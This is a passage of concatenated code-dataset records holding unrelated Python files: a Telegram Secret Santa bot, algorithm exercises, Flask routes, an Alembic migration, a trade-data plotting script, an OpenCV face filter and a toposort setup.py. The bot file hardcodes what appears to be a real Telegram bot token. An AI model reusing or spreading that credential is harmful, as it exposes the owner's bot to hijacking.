Unauthorized:\n print(error)\n # remove update.message.chat_id from conversation list\n except BadRequest:\n print(error)\n # handle malformed requests - read more below!\n except TimedOut:\n print(error)\n # handle slow connection problems\n except NetworkError:\n print(error)\n # handle other connection problems\n except ChatMigrated as e:\n print(error)\n # the chat_id of a group has changed, use e.new_chat_id instead\n except TelegramError:\n print(error)\n # handle all other telegram related errors\n\n\ndef main():\n logging.basicConfig(\n format=\"%(asctime)s - %(name)s - %(levelname)s - %(message)s\",\n level=logging.INFO,\n )\n logger = logging.getLogger(__name__)\n # Create Updater object and attach dispatcher to it\n updater = Updater(token=\"673782777:AAEmRHnnJVe5npGALLSUquytHaRlQ-TfPh8\")\n dispatcher = updater.dispatcher\n print(\"Bot started\")\n\n # Add command handler to dispatcher\n start_handler = CommandHandler(\"start\", start)\n register_handler = CommandHandler(\"register\", register)\n info_handler = CommandHandler(\"info\", info)\n rules_handler = CommandHandler(\"rules\", rules)\n magic_handler = CommandHandler(\"magic\", magic)\n\n dispatcher.add_handler(start_handler)\n dispatcher.add_handler(register_handler)\n dispatcher.add_handler(info_handler)\n dispatcher.add_handler(rules_handler)\n dispatcher.add_handler(magic_handler)\n dispatcher.add_error_handler(error_callback)\n\n # Start the bot\n updater.start_polling()\n\n # Run the bot until you press Ctrl-C\n updater.idle()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"yarikpavlin/secret-santa-prototype","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":7393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"31179775138","text":"n = int(input())\r\n\r\narr = list(map(int, input().split()))\r\n\r\narr = [-1] + arr\r\n\r\nm = int(input())\r\n\r\nstu = []\r\n\r\n\r\ndef male(num):\r\n for i in range(1, n+1):\r\n if i % num == 0:\r\n if arr[i] == 1:\r\n arr[i] = 0\r\n else:\r\n arr[i] = 1\r\n\r\n\r\ndef female(num):\r\n if arr[num] == 1:\r\n arr[num] = 0\r\n else:\r\n arr[num] = 1\r\n\r\n left = num - 1\r\n right = num + 1\r\n\r\n while left > 0 and right <= n:\r\n if arr[left] == arr[right]:\r\n if arr[left] == 1:\r\n arr[left] = 0\r\n arr[right] = 0\r\n else:\r\n arr[left] = 1\r\n arr[right] = 1\r\n\r\n left -= 1\r\n right += 1\r\n else:\r\n break\r\n\r\n\r\nfor i in range(m):\r\n sex, num = map(int, input().split())\r\n\r\n if sex == 1:\r\n male(num)\r\n else:\r\n female(num)\r\n\r\n\r\nfor i in range(1, len(arr)):\r\n if i > 0 and i % 20 == 0:\r\n print(arr[i])\r\n else:\r\n print(arr[i], end=' ')\r\n","repo_name":"junheeLee96/algorithm","sub_path":"백준/Silver/1244. 스위치 켜고 끄기/스위치 켜고 끄기.py","file_name":"스위치 켜고 끄기.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
+{"seq_id":"38584344458","text":"#Format input names, given as strings, as follows\r\n#Sample\r\n#Input Output\r\n#Aryadev Aryadev\r\n#Rajsekhar Basu R. Basu\r\n#Nabaneeta Dev Sen N. D. Sen\r\n#Dawlat Wazir Bahram Khan D. W. B. Khan\r\n\r\n\r\n\r\nstr=input(\"Enter your full name:\")\r\nli=str.split() #split function is use to convert a string into a list\r\nn=len(li)-1 #len function is use to find thelength of the list\r\nfor i in range(0,n):\r\n word=li[i] #in the word variable we store the element of the list\r\n print(word[0:1],end=\"\") #using string slicing we print the first letter of the each element of the list without the last element\r\n print(\". \",end=\"\")\r\nprint(li[n]) #print the last element of the list\r\n\r\n#set1\r\n#Enter your full name:Rajsekhar Basu\r\n#R. Basu\r\n\r\n#set2\r\n#Enter your full name:Dawlat Wazir Bahram Khan\r\n#D. W. B. Khan\r\n\r\n","repo_name":"Avishikta2312/Python-Assignment","sub_path":"4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"74843295209","text":"import json\n\nfrom flask import Blueprint, request\nfrom controllers import main_controller\n\npage = Blueprint('main', __name__)\n\n\n@page.route('/', methods=['GET'])\ndef index():\n return main_controller.main_get()\n\n\n@page.route('/get_data/', methods=['GET'], defaults={'uid': None})\n@page.route('/get_data/', methods=['GET'])\ndef get_data(uid):\n\n if uid is not None:\n with open(f'static/output/audio_{uid}.json', 'r') as f:\n data = json.load(f)\n main_controller.remove_files(uid, is_output=True)\n return data\n\n main_controller.remove_files(uid, is_output=True)\n\n return []\n\n\n@page.route('/example/', methods=['GET'])\ndef example_get():\n return main_controller.example_get()\n\n\n@page.route('/model', methods=['POST'])\ndef model_post():\n data = request.get_json()\n\n keys = ['audio', 'sample_rate']\n\n for key in keys:\n if key not in data:\n return {'status': 'error', 'message': f'{key} not in request'}\n\n return main_controller.model_post(data['audio'], data['sample_rate'])\n","repo_name":"Berkay-23/diarizationAPI","sub_path":"routers/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"19923483584","text":"#Calculando o preço da viagem para 0.50 até 200km se passar disso 0.45\n\nnum = int(input('Digite a distância: '))\nif num <= 200:\n distancia = num * 0.50\n print('Nessa distância, ficará por: R$ {:.2f}'.format(distancia))\nelse:\n distancia2 = num * 0.45\n print('Nessa distância, ficará por: R$ {:.2f}'.format(distancia2))\n\n\n\n#Da pra fazer o IF/ELSE assim também: \n# num=distancia*0.50 if distancia <= 200 else distancia * 0.45 \n#gostei nao mas é isso ai gabriel do futuro, ta anotado.\n","repo_name":"gaxque/Codando-JR","sub_path":"Calcular-KM.py","file_name":"Calcular-KM.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"35995819329","text":"\"\"\"empty message\n\nRevision ID: bcf853c67790\nRevises: f30cc5d13b95\nCreate Date: 2021-08-03 19:26:35.440576\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'bcf853c67790'\ndown_revision = 'f30cc5d13b95'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_constraint('districts_name_key', 'districts', type_='unique')\n op.add_column('judgments', sa.Column(\n 'court_order_number', sa.Integer(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('judgments', 'court_order_number')\n op.create_unique_constraint('districts_name_key', 'districts', ['name'])\n # ### end Alembic commands ###\n","repo_name":"red-door-collective/eviction-tracker","sub_path":"migrations/versions/bcf853c67790_.py","file_name":"bcf853c67790_.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"}
+{"seq_id":"27201657882","text":"import pytest\nfrom src.createcompendia.geneprotein import build_compendium\nimport os\n\ndef test_gp():\n here=os.path.abspath(os.path.dirname(__file__))\n gene_compendium = os.path.join(here,'testdata','gptest_Gene.txt')\n protein_compendium = os.path.join(here,'testdata','gptest_Protein.txt')\n geneprotein_concord = os.path.join(here,'testdata','gp_UniProtNCBI.txt')\n outfile = os.path.join(here,'testdata','gp_output.txt')\n build_compendium(gene_compendium, protein_compendium, geneprotein_concord, outfile)\n with open(outfile,'r') as inf:\n x = inf.read()\n assert len(x) > 0\n print(x)\n","repo_name":"TranslatorSRI/Babel","sub_path":"tests/test_geneproteiny.py","file_name":"test_geneproteiny.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"}
+{"seq_id":"10060240818","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\n\n\n#opening the file\n\ndf1 = pd.read_excel('India_Imports_2011-12_And_2012-13.xls')\t#reading import file\n\ndf2 = pd.read_excel('India_Exports_2011-12_And_2012-13.xls')\t#reading export file\n\nwriter=open('table.tex','w')\n\n#top five import and export destination by total import and export (based on value)\n\n\nop1=df1.groupby('Country').agg({'Value-INR-2011-12':'sum'})\t\t#grouping sum of values of ech country\n\nop2=df2.groupby('Country').agg({'Value-INR-2011-12':'sum'})\n\n\nop1=op1.reset_index()\nop2=op2.reset_index()\n\nop1=op1.nlargest(5, 'Value-INR-2011-12' )\t\t#extraction top 5 values from the results\nop2=op2.nlargest(5, 'Value-INR-2011-12' )\n\n\n\n#for import\ntotal=df1['Value-INR-2011-12'].sum()\nsum1=op1['Value-INR-2011-12'].sum()\n\nother=total-sum1\t\t\t\t#calculating sum of other countries\nop1.loc[5]=['Others',other]\n\nslices=op1['Value-INR-2011-12']\n\ncountry=op1['Country']\n\nplt.pie(slices, labels=country)\n\n\nplt.title('Top 5 Country pie chart for import of year 2011-12')\n\n\nplt.savefig('image1.jpg', bbox_inches='tight')\nplt.clf()\n\n#for export\n\ntotal=df2['Value-INR-2011-12'].sum()\nsum2=op2['Value-INR-2011-12'].sum()\n\nother=total-sum2\t\t\t\t#calculating sum of other countries\nop2.loc[5]=['Others',other]\n\nslices=op2['Value-INR-2011-12']\n\ncountry=op2['Country']\n\nplt.pie(slices, labels=country)\n\n\nplt.title('Top 5 Country pie chart for export of year 2011-12')\n\n\nplt.savefig('image2.jpg', bbox_inches='tight')\nplt.clf()\n\n\n#bar chart for top 5 commodity\ncom1=df1.groupby('Commodity').agg({'Value-INR-2011-12':'sum'})\t\t\t\t#grouping sum of values of ech country\n\ncom2=df2.groupby('Commodity').agg({'Value-INR-2011-12':'sum'})\n\ncom1=com1.reset_index()\t\t\t\t\t\t#resettin index of both\ncom2=com2.reset_index()\n\ncom1=com1.nlargest(5, 'Value-INR-2011-12' )\t\t\t#returning commodities with top 5 values\ncom2=com2.nlargest(5, 'Value-INR-2011-12' )\n\ncom1=com1.reset_index()\t\t\t\t\t\t#resettin index of both\ncom2=com2.reset_index()\n\n#for import\n\nx=com1.index\ny=com1['Value-INR-2011-12']\n\n\n\nplt.bar(x,y, label='bar1', color='r')\nplt.xticks(x, com1['Commodity'],rotation='vertical')\nplt.title('Import bar chart of commodity of year 2011-12')\n\nplt.xlabel('Commodity')\nplt.ylabel('Value-INR-2011-12')\nplt.savefig('image3.jpg', bbox_inches='tight')\nplt.clf()\n\n#for export\nx=com2.index\ny=com2['Value-INR-2011-12']\n\n\n\nplt.bar(x,y, label='bar1', color='c')\nplt.xticks(x, com2['Commodity'],rotation='vertical')\nplt.title('Export bar chart of commodity of year 2011-12')\n\nplt.xlabel('Commodity')\nplt.ylabel('Value-INR-2011-12')\nplt.savefig('image4.jpg', bbox_inches='tight')\nplt.clf()\n\n\n#linegraph of 'TEA' between quantity and value , plotted for stat of each coountry\n\ntea1=df1[df1['Commodity']=='TEA']\ntea2=df2[df2['Commodity']=='TEA']\n\n#import\n\ntea1=tea1.sort_values(['Quantity-2011-12'])\n\nplt.plot(tea1['Quantity-2011-12'],tea1['Value-INR-2011-12'],label='Year 2011-12')\n\ntea1=tea1.sort_values(['Quantity-2012-13'])\n\nplt.plot(tea1['Quantity-2012-13'],tea1['Value-INR-2012-13'], label='Year 2012-13')\n\nplt.title('Import plot for TEA')\n\nplt.xlabel('quantity')\nplt.ylabel('value')\nplt.legend()\nplt.savefig('image5.jpg', bbox_inches='tight')\nplt.clf()\n\n#export\n\ntea2=tea2.sort_values(['Quantity-2011-12'])\n\nplt.plot(tea2['Quantity-2011-12'],tea2['Value-INR-2011-12'],label='Year 2011-12')\n\ntea2=tea2.sort_values(['Quantity-2012-13'])\n\nplt.plot(tea2['Quantity-2012-13'],tea2['Value-INR-2012-13'], label='Year 2012-13')\n\nplt.title('Export plot for TEA')\n\nplt.xlabel('quantity')\nplt.ylabel('value')\nplt.legend()\nplt.savefig('image6.jpg', bbox_inches='tight')\nplt.clf()\n\n\n#Scatterplot of 'RICE' between quantity and value , plotted for stat of each coountry\n\nrice1=df1[df1['Commodity']=='TEA']\nrice2=df2[df2['Commodity']=='TEA']\n\n#import\n\nrice1=rice1.sort_values(['Quantity-2011-12'])\n\nplt.scatter(rice1['Quantity-2011-12'],rice1['Value-INR-2011-12'],label='Year 2011-12' , marker='x',s=10)\n\nrice1=rice1.sort_values(['Quantity-2012-13'])\n\nplt.scatter(rice1['Quantity-2012-13'],rice1['Value-INR-2012-13'], label='Year 2012-13',marker='o',s=10)\n\nplt.title('Import scatter plot for RICE')\n\nplt.xlabel('quantity')\nplt.ylabel('value')\nplt.legend()\nplt.savefig('image7.jpg', bbox_inches='tight')\nplt.clf()\n\n#Export\n\nrice2=rice2.sort_values(['Quantity-2011-12'])\n\nplt.scatter(rice2['Quantity-2011-12'],rice2['Value-INR-2011-12'],label='Year 2011-12' , marker='x',s=10)\n\nrice2=rice2.sort_values(['Quantity-2012-13'])\n\nplt.scatter(rice2['Quantity-2012-13'],rice2['Value-INR-2012-13'], label='Year 2012-13',marker='o',s=10)\n\nplt.title('Export scatter plot for RICE')\n\nplt.xlabel('quantity')\nplt.ylabel('value')\nplt.legend()\nplt.savefig('image8.jpg', bbox_inches='tight')\nplt.clf()\n\n\n#histogram\ncom1=df1.groupby('Country').agg({'Value-INR-2011-12':'sum'})\t\t\t\t#grouping sum of values of ech country\n\ncom2=df2.groupby('Country').agg({'Value-INR-2011-12':'sum'})\n\ncom1=com1.reset_index()\t\t\t\t\t\t#resettin index of both\ncom2=com2.reset_index()\n\n#for import\n\n\ny=com1['Value-INR-2011-12']\n\n\n\nplt.hist(y , color='y',histtype='bar', rwidth=0.7)\n#plt.xticks(x, com1['Commodity'],rotation='vertical')\nplt.title('Import histogram of commodity of year 2011-12')\n\nplt.xlabel('Range of value')\nplt.ylabel('Number of countries ')\nplt.savefig('image9.jpg', bbox_inches='tight')\nplt.clf()\n\n#for export\n\n\ny=com2['Value-INR-2011-12']\n\n\n\nplt.hist(y , color='b',histtype='bar', rwidth=0.7)\n#plt.xticks(x, com1['Commodity'],rotation='vertical')\nplt.title('Export histogram of commodity of year 2011-12')\n\nplt.xlabel('Range of value')\nplt.ylabel('Number of countries ')\nplt.savefig('image10.jpg', bbox_inches='tight')\nplt.clf()\n\n\n#table to latex file\ntea1=tea1.reset_index()\t\ntea1.to_latex(writer)\n","repo_name":"avais25/Software-Lab-CS699","sub_path":"lab-9-pyplot-latex/figures.py","file_name":"figures.py","file_ext":"py","file_size_in_byte":5695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"26864442167","text":"# coding=utf-8\n# import numpy as np\nimport cv2\n\ndef resize_image(image, scale_percent=50):\n rows, cols = image.shape[:2]\n width = int(cols * scale_percent / 100)\n height = int(rows * scale_percent / 100)\n dim = (width, height)\n image = cv2.resize(image, dim, interpolation=cv2.INTER_AREA)\n return image\n\ndef put_object(img,object, x, y, adjx=15, adjy=15):\n obj_rows, obj_cols = object.shape[:2]\n roi_img = img[(y-adjy):(y-adjy)+obj_rows, (x-adjx):(x-adjx)+obj_cols] \n roi_img [object < [150,150,150]] = object [object < [150,150,150]] \n return img\n \n# ==========================================================================\nface_cascade = cv2.CascadeClassifier(\n '../classificadores/haarcascade_frontalface_default.xml')\neye_cascade = cv2.CascadeClassifier('../classificadores/haarcascade_eye.xml')\nmouth_cascade = cv2.CascadeClassifier(\n '../classificadores/haarcascade_mcs_mouth.xml')\n# ==========================================================================\n\nimg = cv2.imread('face.jpg')\nimg = resize_image(img)\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\nmoustache = cv2.imread('moustache_w.png')\nmoustache = resize_image(moustache, 30)\n\n\nglasses = cv2.imread('sungalsses_w.png')\nglasses = resize_image(glasses, 30)\n\nfaces = face_cascade.detectMultiScale(gray)\nfor (x, y, w, h) in faces:\n # cv2.rectangle(img, (x, y), (x+w, y+h), (255, 0, 0), 2)\n roi_gray = gray[y:y+h, x:x+w]\n roi_color = img[y:y+h, x:x+w]\n\n eyes = eye_cascade.detectMultiScale(roi_gray, 1.1, 10) \n for (ex, ey, ew, eh) in eyes:\n roi_color = put_object(roi_color, glasses, ex, ey, 14, -10)\n break\n # cv2.rectangle(roi_color, (ex, ey), (ex+ew, ey+eh), (0, 255, 0), 2)\n \n\n mouth = mouth_cascade.detectMultiScale(roi_gray, 2.0, 20)\n for (mx, my, mw, mh) in mouth:\n roi_color = put_object(roi_color, moustache, mx, my, 15,15)\n # cv2.rectangle(roi_color, (mx, my), (mx+mw, my+mh), (0, 0, 255), 2)\n # break\n\ncv2.imshow('Turing', img)\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()","repo_name":"heloisaGuimaraes/tarefas-processamento-de-imagens-ifma","sub_path":"Aula 13/Filtro Deteccao Face/Exemplo_Faces.py","file_name":"Exemplo_Faces.py","file_ext":"py","file_size_in_byte":2061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"35200055455","text":"from __future__ import print_function\nfrom distutils.core import setup, Command\nimport sys\n\n# This is a hack in order to get the package name to be different when\n# building an RPM file. When 'setup.py bdist_rpm' is called, it invokes\n# setup.py twice more, with these command lines:\n# ['setup.py', 'build']\n# ['setup.py', 'install', '-O1', '--root=/home/eric/local/toposort/build/bdist.linux-i686/rpm/BUILDROOT/python-toposort-0.1-1.i386', '--record=INSTALLED_FILES']\n# It's only on the original call (when bdist_rpm is in sys.argv) that\n# I adjust the package name. With Python 2.7, that's enough. I'm not\n# sure about 3.x.\n\nname = 'toposort'\nif 'bdist_rpm' in sys.argv:\n name = 'python{0}-{1}'.format('' if sys.version_info.major == 2 else '3', name)\n\n\n# run our tests\nclass PyTest(Command):\n user_options = []\n def initialize_options(self):\n pass\n def finalize_options(self):\n pass\n def run(self):\n import sys, subprocess\n tests = [('test suite', ['-m', 'test.test_toposort']),\n ]\n if sys.hexversion >= 0x03000000:\n # Skip doctests for python < 3.0. They use set literal reprs, which\n # are different in 2.7. Testing under 3.x is good enough.\n tests.append(('doctests', ['-m' 'doctest', 'README.txt']))\n for name, cmds in tests:\n print(name)\n errno = subprocess.call([sys.executable] + cmds)\n if errno != 0:\n raise SystemExit(errno)\n print('test complete')\n\n\nsetup(name=name,\n version='1.4',\n url='https://bitbucket.org/ericvsmith/toposort',\n author='Eric V. Smith',\n author_email='eric@trueblade.com',\n description='Implements a topological sort algorithm.',\n long_description=open('README.txt').read() + '\\n' + open('CHANGES.txt').read(),\n classifiers=['Development Status :: 5 - Production/Stable',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: Apache Software License',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3.3',\n 'Programming Language :: Python :: 3.4',\n ],\n license='Apache License Version 2.0',\n py_modules=['toposort'],\n\n cmdclass = {'test': PyTest},\n )\n","repo_name":"tdrhq/bark","sub_path":"toposort-1.4/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"694015899","text":"import flask\nfrom flask import request, jsonify\n\napp = flask.Flask(__name__)\napp.config[\"DEBUG\"] = True\n\n# Test data\nproducts = {'cycling': ['helmet','bike','wheels'],\n 'skiing': ['skis','poles'],\n 'running':['shoes','t-shirt','socks'],\n 'swimming':['bathing suits','swimming cap']}\n\n\n\n@app.route('/', methods=['GET'])\ndef home():\n return '''